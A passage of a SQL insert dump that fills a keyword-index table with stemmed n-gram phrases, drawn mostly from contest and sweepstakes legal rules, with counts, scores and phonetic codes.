intended',0,1,1.5,'B35353',1,'en'),(25931,'by the maker','by the maker',0,1,1.4,'B3526',1,'en'),(25932,'by the same','by the same',0,1,1.3667,'B325',1,'en'),(25933,'by the winner','by the winner',0,1,1.4333,'B356',1,'en'),(25934,'by these','by these',0,1,1.2667,'B320',1,'en'),(25935,'by these official','by these official',0,1,1.5667,'B32124',1,'en'),(25936,'by winner','by winner',0,1,1.3,'B560',1,'en'),(25937,'by winner about','by winner about',0,1,1.5,'B5613',1,'en'),(25938,'c cable','c cable',0,1,1.2333,'C140',1,'en'),(25939,'c cable connection','c cable connection',0,1,1.6,'C1425235',1,'en'),(25940,'c o','c o',0,1,1.1,'C000',1,'en'),(25941,'c o men\'s','c o men',0,1,1.3,'C520',1,'en'),(25942,'cable','cabl',0,0,0.3333,'C140',1,'en'),(25943,'cable connection','cabl connection',0,1,1.5333,'C1425235',1,'en'),(25944,'cable connection electronic','cabl connection electronic',0,1,1.9,'C1425235423652',1,'en'),(25945,'cable electronic','cabl electronic',0,1,1.5333,'C1423652',1,'en'),(25946,'cable electronic or','cabl electronic or',0,1,1.6333,'C14236526',1,'en'),(25947,'campaigns','campaign',0,0,0.6,'C51252',1,'en'),(25948,'campaigns trade','campaign trade',0,1,1.5,'C51252363',1,'en'),(25949,'campaigns trade and','campaign trade and',0,1,1.6333,'C5125236353',1,'en'),(25950,'can 2007','can 2007',0,1,1.2667,'C500',1,'en'),(25951,'can 2007 guide','can 2007 guide',0,1,1.4667,'C523',1,'en'),(25952,'can law','can law',0,1,1.2333,'C540',1,'en'),(25953,'can law and','can law and',0,1,1.3667,'C5453',1,'en'),(25954,'canadian','canadian',0,0,0.5333,'C535',1,'en'),(25955,'canadian occupants','canadian occupants',0,1,1.6,'C53521532',1,'en'),(25956,'canadian occupants to','canadian occupants to',0,1,1.7,'C535215323',1,'en'),(25957,'cancel','cancel',0,0,0.4,'C524',1,'en'),(25958,'cancel transform','cancel transform',0,1,1.5333,'C5243652165',1,'en'),(25959,'cancel transform sponsor','cancel transform sponsor',0,1,1.8,'C524365216521526',1,'en'),(25960,'cannot','cannot',0,0,0.4,'C530',1,'en'),(25961,'cannot be','cannot be',0,1,1.3,'C531',1,'en'),(25962,'cannot be awarded','cannot be awarded',0,1,1.5667,'C53163',1,'en'),(25963,'cannot be reached','cannot be reached',0,1,1.5667,'C531623',1,'en'),(25964,'cannot contain','cannot contain',0,1,1.4667,'C532535',1,'en'),(25965,'cannot contain the','cannot contain the',0,1,1.6,'C5325353',1,'en'),(25966,'cannot or','cannot or',0,1,1.3,'C536',1,'en'),(25967,'cannot or does','cannot or does',0,1,1.4667,'C53632',1,'en'),(25968,'capability','capabl',0,0,0.6667,'C143',1,'en'),(25969,'capability winner','capabl winner',0,1,1.5667,'C14356',1,'en'),(25970,'capability winner s','capabl winner s',0,1,1.6333,'C143562',1,'en'),(25971,'cards','card',0,0,0.3333,'C632',1,'en'),(25972,'cards american','card american',0,1,1.4667,'C6325625',1,'en'),(25973,'cards american express','card american express',0,1,1.7333,'C63256252162',1,'en'),(25974,'cards and','card and',0,1,1.3,'C63253',1,'en'),(25975,'cards and their','card and their',0,1,1.5,'C632536',1,'en'),(25976,'cards have','card have',0,1,1.3333,'C6321',1,'en'),(25977,'cards have been','card have been',0,1,1.5,'C63215',1,'en'),(25978,'cards once','card once',0,1,1.3333,'C63252',1,'en'),(25979,'cards once the','card once the',0,1,1.4667,'C632523',1,'en'),(25980,'cards we','card we',0,1,1.2667,'C632',1,'en'),(25981,'cards we have','card we have',0,1,1.4333,'C6321',1,'en'),(25982,'cardsshould','cardsshould',0,0,0.7333,'C63243',1,'en'),(25983,'cardsshould be','cardsshould be',0,1,1.4667,'C632431',1,'en'),(25984,'cardsshould be considered','cardsshould be considered',0,1,1.8333,'C632431252363',1,'en'),(25985,'cash','cash',0,0,0.2667,'C000',1,'en'),(25986,'cash counterpart','cash counterpart',0,1,1.5333,'C536163',1,'en'),(25987,'cash counterpart .all','cash counterpart .all',0,1,1.7,'C5361634',1,'en'),(25988,'cause','caus',0,0,0.3333,'C000',1,'en'),(25989,'cause use','caus use',0,1,1.3,'C000',1,'en'),(25990,'cause use of','caus use of',0,1,1.4,'C100',1,'en'),(25991,'caused','caus',0,0,0.4,'C300',1,'en'),(25992,'caused by','caus by',0,1,1.3,'C310',1,'en'),(25993,'caused by any','caus by any',0,1,1.4333,'C315',1,'en'),(25994,'caused by awarding','caus by awarding',0,1,1.6,'C316352',1,'en'),(25995,'caused relating','caus relating',0,1,1.5,'C364352',1,'en'),(25996,'caused relating to','caus relating to',0,1,1.6,'C3643523',1,'en'),(25997,'causes of','caus of',0,1,1.3,'C100',1,'en'),(25998,'causes of action','caus of action',0,1,1.5333,'C1235',1,'en'),(25999,'cell','cell',0,0,0.2667,'C400',2,'en'),(26000,'cell phone','cell phone',0,1,1.3333,'C415',2,'en'),(26001,'cell phone number','cell phone number',0,1,1.5667,'C41516',1,'en'),(26002,'certification','certif',0,0,0.8667,'C631235',1,'en'),(26003,'certification that','certif that',0,1,1.6,'C6312353',1,'en'),(26004,'certification that sponsor','certif that sponsor',0,1,1.8667,'C631235321526',1,'en'),(26005,'changes after','chang after',0,1,1.4333,'C52136',1,'en'),(26006,'changes after he','chang after he',0,1,1.5333,'C52136',1,'en'),(26007,'cheap ralph','cheap ralph',0,1,1.3667,'C1641',4,'en'),(26008,'cheap ralph lauren','cheap ralph lauren',0,1,1.6,'C1641465',4,'en'),(26009,'chemicals','chemic',0,0,0.6,'C5242',2,'en'),(26010,'chemicals photos','chemic photos',0,1,1.5333,'C5242132',1,'en'),(26011,'chemicals photos or','chemic photos or',0,1,1.6333,'C52421326',1,'en'),(26012,'choice of law','choic of law',0,1,1.4333,'C140',1,'en'),(26013,'citizens','citizen',0,0,0.5333,'C3252',1,'en'),(26014,'citizens of','citizen of',0,1,1.3667,'C32521',1,'en'),(26015,'citizens of the','citizen of the',0,1,1.5,'C325213',1,'en'),(26016,'claim','claim',0,0,0.3333,'C450',1,'en'),(26017,'claim of','claim of',0,1,1.2667,'C451',1,'en'),(26018,'claim of forum','claim of forum',0,1,1.4667,'C45165',1,'en'),(26019,'claiming','claim',0,0,0.5333,'C452',1,'en'),(26020,'claiming the','claim the',0,1,1.4,'C4523',1,'en'),(26021,'claiming the prize','claim the prize',0,1,1.6,'C4523162',1,'en'),(26022,'claims','claim',0,0,0.4,'C452',1,'en'),(26023,'claims adding','claim adding',0,1,1.4333,'C452352',1,'en'),(26024,'claims adding emotional','claim adding emotional',0,1,1.7667,'C4523525354',1,'en'),(26025,'claims or','claim or',0,1,1.3,'C4526',1,'en'),(26026,'claims or announcements','claim or announcements',0,1,1.7667,'C452652532',1,'en'),(26027,'claims or causes','claim or causes',0,1,1.5333,'C45262',1,'en'),(26028,'clause','claus',0,0,0.4,'C420',1,'en'),(26029,'clause by','claus by',0,1,1.3,'C421',1,'en'),(26030,'clause by engaging','claus by engaging',0,1,1.6,'C4215252',1,'en'),(26031,'client his','client his',0,1,1.3333,'C4532',1,'en'),(26032,'client his her','client his her',0,1,1.4667,'C45326',1,'en'),(26033,'collected','collect',0,0,0.6,'C423',2,'en'),(26034,'collected by','collect by',0,1,1.4,'C4231',1,'en'),(26035,'collected by sponsor','collect by sponsor',0,1,1.6667,'C423121526',1,'en'),(26036,'collected on','collect on',0,1,1.4,'C4235',1,'en'),(26037,'collected on july','collect on july',0,1,1.5667,'C423524',1,'en'),(26038,'collection','collect',0,0,0.6667,'C4235',2,'en'),(26039,'collection use','collect use',0,1,1.4667,'C42352',1,'en'),(26040,'collection use and','collect use and',0,1,1.6,'C4235253',1,'en'),(26041,'commercial efforts','commerci efforts',0,1,1.6,'C56241632',1,'en'),(26042,'commercial efforts to','commerci efforts to',0,1,1.7,'C562416323',1,'en'),(26043,'committed fraud','commit fraud',0,1,1.5,'C53163',1,'en'),(26044,'committed fraud or','commit fraud or',0,1,1.6,'C531636',1,'en'),(26045,'commonwealth','commonwealth',0,0,0.8,'C543',1,'en'),(26046,'commonwealth of','commonwealth of',0,1,1.5,'C5431',1,'en'),(26047,'commonwealth of missouri','commonwealth of missouri',0,1,1.8,'C5431526',1,'en'),(26048,'commonwealth of pennsylvania','commonwealth of pennsylvania',0,1,1.9333,'C543152415',1,'en'),(26049,'companies or','compani or',0,1,1.4,'C51526',1,'en'),(26050,'companies or any','compani or any',0,1,1.5333,'C515265',1,'en'),(26051,'companies subsidiaries','compani subsidiaries',0,1,1.7333,'C515212362',1,'en'),(26052,'companies subsidiaries affiliate','compani subsidiaries affiliate',0,1,2,'C515212362143',1,'en'),(26053,'company american','compani american',0,1,1.5333,'C515625',1,'en'),(26054,'company american express','compani american express',0,1,1.8,'C5156252162',1,'en'),(26055,'company is','compani is',0,1,1.3333,'C5152',1,'en'),(26056,'company is not','compani is not',0,1,1.4667,'C515253',1,'en'),(26057,'company owners','compani owners',0,1,1.4667,'C51562',1,'en'),(26058,'company owners from','compani owners from',0,1,1.6333,'C51562165',1,'en'),(26059,'compensation','compens',0,0,0.8,'C515235',1,'en'),(26060,'compensation claims','compens claims',0,1,1.6333,'C5152352452',1,'en'),(26061,'compensation claims adding','compens claims adding',0,1,1.8667,'C5152352452352',1,'en'),(26062,'completing','complet',0,0,0.6667,'C514352',2,'en'),(26063,'completing as','complet as',0,1,1.4333,'C514352',1,'en'),(26064,'completing as told','complet as told',0,1,1.6,'C514352343',1,'en'),(26065,'comply','compli',0,0,0.4,'C514',1,'en'),(26066,'comply with','compli with',0,1,1.3667,'C5143',1,'en'),(26067,'comply with federal','compli with federal',0,1,1.6333,'C51431364',1,'en'),(26068,'comply with or','compli with or',0,1,1.4667,'C51436',1,'en'),(26069,'comply with the','compli with the',0,1,1.5,'C5143',1,'en'),(26070,'comprises','compris',0,0,0.6,'C5162',1,'en'),(26071,'comprises of','compris of',0,1,1.4,'C51621',1,'en'),(26072,'comprises of two','compris of two',0,1,1.5333,'C516213',1,'en'),(26073,'comprises the','compris the',0,1,1.4333,'C51623',1,'en'),(26074,'comprises the winner','compris the winner',0,1,1.6667,'C5162356',1,'en'),(26075,'compromise','compromis',0,0,0.6667,'C51652',1,'en'),(26076,'compromise the','compromis the',0,1,1.4667,'C516523',1,'en'),(26077,'compromise the integrity','compromis the integrity',0,1,1.8,'C51652353263',1,'en'),(26078,'computer does','comput does',0,1,1.4333,'C513632',1,'en'),(26079,'computer does not','comput does not',0,1,1.5667,'C51363253',1,'en'),(26080,'computer electronics','comput electronics',0,1,1.6667,'C5136423652',1,'en'),(26081,'computer electronics a','comput electronics a',0,1,1.7333,'C5136423652',1,'en'),(26082,'computer r','comput r',0,1,1.3333,'C5136',1,'en'),(26083,'computer r c','comput r c',0,1,1.4,'C51362',1,'en'),(26084,'computer regardless','comput regardless',0,1,1.6333,'C513626342',1,'en'),(26085,'computer regardless how','comput regardless how',0,1,1.7667,'C513626342',1,'en'),(26086,'concerning or','concern or',0,1,1.4333,'C526526',1,'en'),(26087,'concerning or arising','concern or arising',0,1,1.7,'C526526252',1,'en'),(26088,'concerning the','concern the',0,1,1.4667,'C526523',1,'en'),(26089,'concerning the development','concern the development',0,1,1.8667,'C52652314153',1,'en'),(26090,'confined','confin',0,0,0.5333,'C5153',1,'en'),(26091,'confined by','confin by',0,1,1.3667,'C51531',1,'en'),(26092,'confined by law','confin by law',0,1,1.5,'C515314',1,'en'),(26093,'conflict','conflict',0,0,0.5333,'C51423',1,'en'),(26094,'conflict of','conflict of',0,1,1.3667,'C514231',1,'en'),(26095,'conflict of law','conflict of law',0,1,1.5,'C5142314',1,'en'),(26096,'confront','confront',0,0,0.5333,'C51653',1,'en'),(26097,'confront number','confront number',0,1,1.5,'C51653516',1,'en'),(26098,'confront number and','confront number and',0,1,1.6333,'C5165351653',1,'en'),(26099,'connection','connect',0,0,0.6667,'C5235',1,'en'),(26100,'connection electronic','connect electronic',0,1,1.7,'C5235423652',1,'en'),(26101,'connection electronic or','connect electronic or',0,1,1.8,'C52354236526',1,'en'),(26102,'consent','consent',0,0,0.4667,'C5253',1,'en'),(26103,'consent for','consent for',0,1,1.3667,'C525316',1,'en'),(26104,'consent for sponsor','consent for sponsor',0,1,1.6333,'C52531621526',1,'en'),(26105,'consent to','consent to',0,1,1.3333,'C5253',1,'en'),(26106,'consent to allow','consent to allow',0,1,1.5333,'C52534',1,'en'),(26107,'consent to the','consent to the',0,1,1.4667,'C5253',1,'en'),(26108,'considered anywhere','consid anywhere',0,1,1.6333,'C5236356',1,'en'),(26109,'considered anywhere they','consid anywhere they',0,1,1.8,'C52363563',1,'en'),(26110,'construed','constru',0,0,0.6,'C52363',1,'en'),(26111,'construed according','constru according',0,1,1.6333,'C5236326352',1,'en'),(26112,'construed according to','constru according to',0,1,1.7333,'C52363263523',1,'en'),(26113,'contain','contain',0,0,0.4667,'C535',1,'en'),(26114,'contain any','contain any',0,1,1.3667,'C535',1,'en'),(26115,'contain any mistakes','contain any mistakes',0,1,1.6667,'C535232',1,'en'),(26116,'contain but','contain but',0,1,1.3667,'C53513',1,'en'),(26117,'contain but not','contain but not',0,1,1.5,'C5351353',1,'en'),(26118,'contain the','contain the',0,1,1.3667,'C5353',1,'en'),(26119,'contain the image','contain the image',0,1,1.5667,'C535352',1,'en'),(26120,'contained','contain',0,0,0.6,'C5353',1,'en'),(26121,'contained in','contain in',0,1,1.4,'C53535',1,'en'),(26122,'contained in sponsor','contain in sponsor',0,1,1.6667,'C5353521526',1,'en'),(26123,'contest','contest',0,0,0.4667,'C5323',1,'en'),(26124,'contest and','contest and',0,1,1.3667,'C532353',1,'en'),(26125,'contest and endorse','contest and endorse',0,1,1.6333,'C5323535362',1,'en'),(26126,'contest c','contest c',0,1,1.3,'C53232',1,'en'),(26127,'contest c o','contest c o',0,1,1.3667,'C53232',1,'en'),(26128,'contest entrants','contest entrants',0,1,1.5333,'C5323536532',1,'en'),(26129,'contest entrants will','contest entrants will',0,1,1.7,'C53235365324',1,'en'),(26130,'contest or','contest or',0,1,1.3333,'C53236',1,'en'),(26131,'contest or win','contest or win',0,1,1.4667,'C532365',1,'en'),(26132,'contest or with','contest or with',0,1,1.5,'C532363',1,'en'),(26133,'contest purchase','contest purchase',0,1,1.5333,'C5323162',1,'en'),(26134,'contest purchase or','contest purchase or',0,1,1.6333,'C53231626',1,'en'),(26135,'contest rodale','contest rodale',0,1,1.4667,'C5323634',1,'en'),(26136,'contest rodale corporation','contest rodale corporation',0,1,1.8667,'C5323634261635',1,'en'),(26137,'contests','contest',0,0,0.5333,'C53232',1,'en'),(26138,'contests it','contest it',0,1,1.3667,'C532323',1,'en'),(26139,'contests it is','contest it is',0,1,1.4667,'C5323232',1,'en'),(26140,'contests or','contest or',0,1,1.3667,'C532326',1,'en'),(26141,'contests or person','contest or person',0,1,1.6,'C5323261625',1,'en'),(26142,'contests or receive','contest or receive',0,1,1.6333,'C53232621',1,'en'),(26143,'contract date','contract date',0,1,1.4333,'C53623',1,'en'),(26144,'contract date discharge','contract date discharge',0,1,1.7667,'C53623262',1,'en'),(26145,'control and','control and',0,1,1.3667,'C536453',1,'en'),(26146,'control and also','control and also',0,1,1.5333,'C53645342',1,'en'),(26147,'conveniens','convenien',0,0,0.6667,'C5152',1,'en'),(26148,'conveniens or','convenien or',0,1,1.4333,'C51526',1,'en'),(26149,'conveniens or lack','convenien or lack',0,1,1.6,'C5152642',1,'en'),(26150,'corporation','corpor',0,0,0.7333,'C61635',2,'en'),(26151,'corporation 733','corpor 733',0,1,1.5,'C61635',1,'en'),(26152,'corporation 733 3rd','corpor 733 3rd',0,1,1.6333,'C6163563',1,'en'),(26153,'cost or','cost or',0,1,1.2333,'C360',1,'en'),(26154,'cost or expense','cost or expense',0,1,1.5,'C362152',1,'en'),(26155,'counterpart','counterpart',0,0,0.7333,'C536163',1,'en'),(26156,'counterpart .all','counterpart .all',0,1,1.5333,'C5361634',1,'en'),(26157,'counterpart .all prizes','counterpart .all prizes',0,1,1.7667,'C5361634162',1,'en'),(26158,'countries areas','countri areas',0,1,1.5,'C536262',1,'en'),(26159,'countries areas or','countri areas or',0,1,1.6,'C5362626',1,'en'),(26160,'country wide','countri wide',0,1,1.4,'C5363',1,'en'),(26161,'country wide state','countri wide state',0,1,1.6,'C536323',1,'en'),(26162,'county','counti',0,0,0.4,'C530',2,'en'),(26163,'county of','counti of',0,1,1.3,'C531',1,'en'),(26164,'county of lehigh','counti of lehigh',0,1,1.5333,'C53142',1,'en'),(26165,'court','court',0,0,0.3333,'C630',2,'en'),(26166,'court having','court having',0,1,1.4,'C63152',1,'en'),(26167,'court having jurisdiction','court having jurisdiction',0,1,1.8333,'C63152623235',1,'en'),(26168,'court performs','court performs',0,1,1.4667,'C63161652',1,'en'),(26169,'court performs entrants','court performs entrants',0,1,1.7667,'C63161652536532',1,'en'),(26170,'courts','court',0,0,0.4,'C632',1,'en'),(26171,'courts and','court and',0,1,1.3333,'C63253',1,'en'),(26172,'courts and waive','court and waive',0,1,1.5333,'C632531',1,'en'),(26173,'created to','creat to',0,1,1.3333,'C630',1,'en'),(26174,'created to include','creat to include',0,1,1.6,'C635243',1,'en'),(26175,'creator','creator',0,0,0.4667,'C636',1,'en'),(26176,'creator of','creator of',0,1,1.3333,'C6361',1,'en'),(26177,'creator of the','creator of the',0,1,1.4667,'C63613',1,'en'),(26178,'criteria','criteria',0,0,0.5333,'C636',2,'en'),(26179,'criteria simply','criteria simply',0,1,1.5,'C6362514',1,'en'),(26180,'criteria simply by','criteria simply by',0,1,1.6,'C63625141',1,'en'),(26181,'customer','custom',0,0,0.5333,'C356',1,'en'),(26182,'customer reviews','custom reviews',0,1,1.5333,'C35612',1,'en'),(26183,'customer reviews and','custom reviews and',0,1,1.6667,'C3561253',1,'en'),(26184,'cycles','cycl',0,0,0.4,'C420',1,'en'),(26185,'cycles f','cycl f',0,1,1.2667,'C421',1,'en'),(26186,'cycles f potential','cycl f potential',0,1,1.6,'C4213534',1,'en'),(26187,'d acting','d acting',0,1,1.2667,'D2352',1,'en'),(26188,'d acting in','d acting in',0,1,1.3667,'D23525',1,'en'),(26189,'dad','dad',0,0,0.2,'D000',1,'en'),(26190,'dad step','dad step',0,1,1.2667,'D231',1,'en'),(26191,'dad step modern','dad step modern',0,1,1.5,'D2315365',1,'en'),(26192,'damage','damag',0,0,0.4,'D520',1,'en'),(26193,'damage compensation','damag compensation',0,1,1.6333,'D52515235',1,'en'),(26194,'damage compensation claims','damag compensation claims',0,1,1.8667,'D525152352452',1,'en'),(26195,'damage to','damag to',0,1,1.3,'D523',1,'en'),(26196,'damage to entrants','damag to entrants',0,1,1.6,'D523536532',1,'en'),(26197,'damaged','damag',0,0,0.4667,'D523',1,'en'),(26198,'damaged or','damag or',0,1,1.3333,'D5236',1,'en'),(26199,'damaged or perhaps','damag or perhaps',0,1,1.6,'D52361612',1,'en'),(26200,'data entirely','data entirely',0,1,1.4333,'D5364',1,'en'),(26201,'data entirely or','data entirely or',0,1,1.5333,'D53646',1,'en'),(26202,'date','date',0,0,0.2667,'D000',3,'en'),(26203,'date discharge','date discharge',0,1,1.4667,'D262',1,'en'),(26204,'date discharge of','date discharge of',0,1,1.5667,'D2621',1,'en'),(26205,'date of','date of',0,1,1.2333,'D100',1,'en'),(26206,'date of the','date of the',0,1,1.3667,'D130',1,'en'),(26207,'date sponsor','date sponsor',0,1,1.4,'D21526',1,'en'),(26208,'date sponsor sent','date sponsor sent',0,1,1.5667,'D21526253',1,'en'),(26209,'date the','date the',0,1,1.2667,'D000',1,'en'),(26210,'date the notice','date the notice',0,1,1.5,'D532',1,'en'),(26211,'dates','date',0,0,0.3333,'D200',1,'en'),(26212,'dates employees','date employees',0,1,1.5,'D25142',1,'en'),(26213,'dates employees broker','date employees broker',0,1,1.7333,'D251421626',1,'en'),(26214,'day on','dai on',0,1,1.2,'D500',1,'en'),(26215,'day on the','dai on the',0,1,1.3333,'D530',1,'en'),(26216,'days after','dai after',0,1,1.3333,'D2136',1,'en'),(26217,'days after receipt','dai after receipt',0,1,1.6,'D2136213',1,'en'),(26218,'days from','dai from',0,1,1.3,'D2165',1,'en'),(26219,'days from the','dai from the',0,1,1.4333,'D21653',1,'en'),(26220,'days the','dai the',0,1,1.2667,'D230',1,'en'),(26221,'days the actual','dai the actual',0,1,1.5,'D23234',1,'en'),(26222,'death','death',0,0,0.3333,'D000',1,'en'),(26223,'death which','death which',0,1,1.3667,'D200',1,'en'),(26224,'death which may','death which may',0,1,1.5,'D250',1,'en'),(26225,'debbie','debbi',0,0,0.4,'D100',1,'en'),(26226,'debbie potential','debbi potential',0,1,1.5333,'D13534',1,'en'),(26227,'debbie potential winner','debbi potential winner',0,1,1.7667,'D1353456',1,'en'),(26228,'deception','decept',0,0,0.6,'D2135',1,'en'),(26229,'deception in','decept in',0,1,1.4,'D2135',1,'en'),(26230,'deception in entering','decept in entering',0,1,1.7,'D21353652',1,'en'),(26231,'decided on','decid on',0,1,1.3333,'D235',1,'en'),(26232,'decided on once','decid on once',0,1,1.5,'D2352',1,'en'),(26233,'declare','declar',0,0,0.4667,'D246',1,'en'),(26234,'declare and','declar and',0,1,1.3667,'D24653',1,'en'),(26235,'declare and local','declar and local',0,1,1.5667,'D24653424',1,'en'),(26236,'deems','deem',0,0,0.3333,'D520',1,'en'),(26237,'deems him','deem him',0,1,1.3,'D525',1,'en'),(26238,'deems him her','deem him her',0,1,1.4333,'D5256',1,'en'),(26239,'defamation','defam',0,0,0.6667,'D1535',1,'en'),(26240,'defamation or','defam or',0,1,1.4333,'D15356',1,'en'),(26241,'defamation or invasion','defam or invasion',0,1,1.7333,'D153565125',1,'en'),(26242,'delays','delai',0,0,0.4,'D420',1,'en'),(26243,'delays or','delai or',0,1,1.3,'D426',1,'en'),(26244,'delays or disruptions','delai or disruptions',0,1,1.7,'D4263261352',1,'en'),(26245,'delivery by','deliveri by',0,1,1.3667,'D4161',1,'en'),(26246,'delivery by acknowledging','deliveri by acknowledging',0,1,1.8333,'D41612543252',1,'en'),(26247,'depend','depend',0,0,0.4,'D153',1,'en'),(26248,'depend on','depend on',0,1,1.3,'D1535',1,'en'),(26249,'depend on the','depend on the',0,1,1.4333,'D15353',1,'en'),(26250,'dependability','depend',0,0,0.8667,'D153143',1,'en'),(26251,'dependability to','depend to',0,1,1.5333,'D153143',1,'en'),(26252,'dependability to notify','depend to notify',0,1,1.7667,'D153143531',1,'en'),(26253,'depictions','depict',0,0,0.6667,'D12352',1,'en'),(26254,'depictions of','depict of',0,1,1.4333,'D123521',1,'en'),(26255,'depictions of famous','depict of famous',0,1,1.6667,'D12352152',1,'en'),(26256,'depictions of prizes','depict of prizes',0,1,1.6667,'D12352162',1,'en'),(26257,'destruction','destruct',0,0,0.7333,'D236235',2,'en'),(26258,'destruction injuries','destruct injuries',0,1,1.6667,'D236235262',1,'en'),(26259,'destruction injuries or','destruct injuries or',0,1,1.7667,'D2362352626',1,'en'),(26260,'details per','detail per',0,1,1.3667,'D4216',1,'en'),(26261,'details per day','detail per day',0,1,1.5,'D42163',1,'en'),(26262,'development abilities','develop abilities',0,1,1.7,'D141531432',1,'en'),(26263,'development abilities presentation','develop abilities presentation',0,1,2,'D141531432162535',1,'en'),(26264,'development contest','develop contest',0,1,1.6333,'D1415325323',1,'en'),(26265,'development contest c','develop contest c',0,1,1.7,'D14153253232',1,'en'),(26266,'devices to','devic to',0,1,1.3333,'D123',1,'en'),(26267,'devices to submit','devic to submit',0,1,1.5667,'D1232153',1,'en'),(26268,'digital','digit',0,0,0.4667,'D234',2,'en'),(26269,'digital computer','digit computer',0,1,1.5333,'D23425136',1,'en'),(26270,'digital computer electronics','digit computer electronics',0,1,1.9333,'D23425136423652',1,'en'),(26271,'dilemmas','dilemma',0,0,0.5333,'D452',1,'en'),(26272,'dilemmas agouritorito','dilemma agouritorito',0,1,1.7,'D4526363',1,'en'),(26273,'dilemmas agouritorito any','dilemma agouritorito any',0,1,1.8333,'D45263635',1,'en'),(26274,'dings','ding',0,0,0.3333,'D520',1,'en'),(26275,'dings shock','ding shock',0,1,1.3667,'D520',1,'en'),(26276,'dings shock cost','ding shock cost',0,1,1.5333,'D523',1,'en'),(26277,'directors','director',0,0,0.6,'D62362',1,'en'),(26278,'directors assume','director assume',0,1,1.5333,'D623625',1,'en'),(26279,'directors assume no','director assume no',0,1,1.6333,'D623625',1,'en'),(26280,'directors shall','director shall',0,1,1.5,'D623624',1,'en'),(26281,'directors shall not','director shall not',0,1,1.6333,'D62362453',1,'en'),(26282,'disallowed','disallow',0,0,0.6667,'D243',1,'en'),(26283,'disallowed all','disallow all',0,1,1.4667,'D2434',1,'en'),(26284,'disallowed all issues','disallow all issues',0,1,1.7,'D24342',1,'en'),(26285,'disallowed by','disallow by',0,1,1.4333,'D2431',1,'en'),(26286,'disallowed by law','disallow by law',0,1,1.5667,'D24314',1,'en'),(26287,'discharge','discharg',0,0,0.6,'D262',1,'en'),(26288,'discharge of','discharg of',0,1,1.4,'D2621',1,'en'),(26289,'discharge of liability','discharg of liability',0,1,1.7333,'D26214143',1,'en'),(26290,'disclosure','disclosur',0,0,0.6667,'D2426',1,'en'),(26291,'disclosure of','disclosur of',0,1,1.4333,'D24261',1,'en'),(26292,'disclosure of information','disclosur of information',0,1,1.8333,'D24261516535',1,'en'),(26293,'disclosures','disclosur',0,0,0.7333,'D24262',1,'en'),(26294,'disclosures made','disclosur made',0,1,1.5333,'D2426253',1,'en'),(26295,'disclosures made by','disclosur made by',0,1,1.6333,'D24262531',1,'en'),(26296,'dispute','disput',0,0,0.4667,'D213',1,'en'),(26297,'dispute relating','disput relating',0,1,1.5333,'D21364352',1,'en'),(26298,'dispute relating to','disput relating to',0,1,1.6333,'D213643523',1,'en'),(26299,'disqualified','disqualifi',0,0,0.8,'D2413',1,'en'),(26300,'disqualified from','disqualifi from',0,1,1.5667,'D2413165',1,'en'),(26301,'disqualified from the','disqualifi from the',0,1,1.7,'D24131653',1,'en'),(26302,'disqualified plus','disqualifi plus',0,1,1.5667,'D2413142',1,'en'),(26303,'disqualified plus entry','disqualifi plus entry',0,1,1.7667,'D2413142536',1,'en'),(26304,'disqualify','disqualifi',0,0,0.6667,'D241',1,'en'),(26305,'disqualify someone','disqualifi someone',0,1,1.6,'D24125',1,'en'),(26306,'disqualify someone it','disqualifi someone it',0,1,1.7,'D241253',1,'en'),(26307,'disruptions','disrupt',0,0,0.7333,'D261352',1,'en'),(26308,'disruptions due','disrupt due',0,1,1.5,'D2613523',1,'en'),(26309,'disruptions due to','disrupt due to',0,1,1.6,'D2613523',1,'en'),(26310,'distress','distress',0,0,0.5333,'D2362',1,'en'),(26311,'distress and','distress and',0,1,1.4,'D236253',1,'en'),(26312,'distress and or','distress and or',0,1,1.5,'D2362536',1,'en'),(26313,'do networking','do networking',0,1,1.4333,'D536252',1,'en'),(26314,'do networking internet','do networking internet',0,1,1.7333,'D53625253653',1,'en'),(26315,'do not','do not',0,1,1.2,'D530',2,'en'),(26316,'do not comply','do not comply',0,1,1.4333,'D532514',1,'en'),(26317,'do with','do with',0,1,1.2333,'D000',2,'en'),(26318,'do with or','do with or',0,1,1.3333,'D600',1,'en'),(26319,'does','doe',0,0,0.2667,'D200',3,'en'),(26320,'does not','doe not',0,1,1.2667,'D253',1,'en'),(26321,'does not comply','doe not comply',0,1,1.5,'D2532514',1,'en'),(26322,'does not work','doe not work',0,1,1.4333,'D25362',1,'en'),(26323,'download tax','download tax',0,1,1.4,'D5432',1,'en'),(26324,'download tax refund','download tax refund',0,1,1.6333,'D54326153',1,'en'),(26325,'downloading','download',0,0,0.7333,'D54352',1,'en'),(26326,'downloading materials','download materials',0,1,1.7,'D5435253642',1,'en'),(26327,'downloading materials or','download materials or',0,1,1.8,'D54352536426',1,'en'),(26328,'drawing','draw',0,0,0.4667,'D652',1,'en'),(26329,'drawing or','draw or',0,1,1.3333,'D6526',1,'en'),(26330,'drawing or receive','draw or receive',0,1,1.6,'D652621',1,'en'),(26331,'drawings','draw',0,0,0.5333,'D652',1,'en'),(26332,'drawings and','draw and',0,1,1.4,'D65253',1,'en'),(26333,'drawings and or','draw and or',0,1,1.5,'D652536',1,'en'),(26334,'drawings d','draw d',0,1,1.3333,'D6523',1,'en'),(26335,'drawings d acting','draw d acting',0,1,1.5667,'D65232352',1,'en'),(26336,'drawings or','draw or',0,1,1.3667,'D6526',1,'en'),(26337,'drawings or supplying','draw or supplying',0,1,1.7,'D652621452',1,'en'),(26338,'drawings to','draw to',0,1,1.3667,'D6523',1,'en'),(26339,'drawings to include','draw to include',0,1,1.6333,'D65235243',1,'en'),(26340,'due to acts','due to acts',0,1,1.3667,'D232',1,'en'),(26341,'due to private','due to private',0,1,1.4667,'D1613',1,'en'),(26342,'due to travel','due to travel',0,1,1.4333,'D614',1,'en'),(26343,'duration','durat',0,0,0.5333,'D635',1,'en'),(26344,'duration of','durat of',0,1,1.3667,'D6351',1,'en'),(26345,'duration of entry','durat of entry',0,1,1.5667,'D6351536',1,'en'),(26346,'duty','duti',0,0,0.2667,'D000',2,'en'),(26347,'duty of','duti of',0,1,1.2333,'D100',1,'en'),(26348,'duty of the','duti of the',0,1,1.3667,'D130',1,'en'),(26349,'e mail addresses','e mail addresses',0,1,1.5333,'E54362',1,'en'),(26350,'e mail at','e mail at',0,1,1.3,'E543',1,'en'),(26351,'e mail details','e mail details',0,1,1.4667,'E54342',1,'en'),(26352,'e mail residence','e mail residence',0,1,1.5333,'E5462352',1,'en'),(26353,'e mail url','e mail url',0,1,1.3333,'E5464',1,'en'),(26354,'e mail using','e mail using',0,1,1.4,'E54252',1,'en'),(26355,'e mail was','e mail 